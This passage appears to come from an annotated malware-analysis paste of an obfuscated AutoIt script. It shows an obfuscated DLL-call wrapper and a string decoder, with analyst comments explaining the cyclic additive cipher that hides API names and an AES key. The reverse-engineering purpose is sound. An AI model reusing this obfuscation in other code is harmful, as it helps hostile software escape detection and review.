- LOCAL $ACALL=$ADMINISTRATIONROOTEXPLOITHOOKADMINISTRATIONHOOK(STRINGDEC("gisqrnanonrphwezrnlerrcpslnegz","4,-4,-1,-3,-13,-2,-46,-60,-65,-10,-6,-4"),STRINGDEC("whvjqzlpfkorqulxjmxmbcnireihzm","-7,12,-4"),STRINGDEC("ejkuftmguocuyhwozahfcvigcwnibd","-30,-5,9,-37,12,-5,-10,-38,-17,-11,15,-16,-6,11"),STRINGDEC("wvyhizikrnukotjwuqbnvlyvoqlxdb","-15,-21,-11,-4,3,-21"),$HMODULE,$STYPE,$VNAME)
- IF @ERROR OR NOT $ACALL[0]THEN RETURN $ROOTKERNELHOOKHOOKBYPASSROOT(1,0,0)
- RETURN $ACALL[0]
- ENDFUNC
- ; String de-obfuscation routine used for every struct definition, DLL name, API
- ; name, type string and the AES key in this script. $STRING is a key string
- ; (30 letters everywhere in this paste) and $PARAM a comma-separated list of
- ; signed offsets. Output character i is ChrW($PARAM[i] + Asc($STRING[i mod len])),
- ; i.e. a cyclic additive cipher; the key index wraps to 0 when it reaches the
- ; last key character. Example: STRINGDEC("iyfyemhyqmldhzjikiefukojbszgwz",
- ; "-7,0,14,-20,-10") = "byte[". For analysis, all plaintexts in this file can be
- ; recovered offline with the same formula. $COUNT/$RETURN/$CHAR/$COMPARE are
- ; assigned without Local; by AutoIt's default they are function-local unless a
- ; Global of the same name exists.
- FUNC STRINGDEC($STRING,$PARAM)
- ; Key as an array of code points; offsets as an array of strings (StringSplit
- ; flag 2 = no count element), coerced to numbers by the addition.
- $STRING=STRINGTOASCIIARRAY($STRING)
- $PARAM=STRINGSPLIT($PARAM,",",2)
- $COUNT=0
- $RETURN=""
- FOR $I=0 TO UBOUND($PARAM)-1
- $CHAR=$PARAM[$I]
- $COMPARE=$STRING[$COUNT]
- $RETURN&=CHRW($CHAR+$COMPARE)
- IF $COUNT=UBOUND($STRING)-1 THEN
- $COUNT=0
- ELSE
- $COUNT=$COUNT+1
- ENDIF
- NEXT
- RETURN $RETURN
- ENDFUNC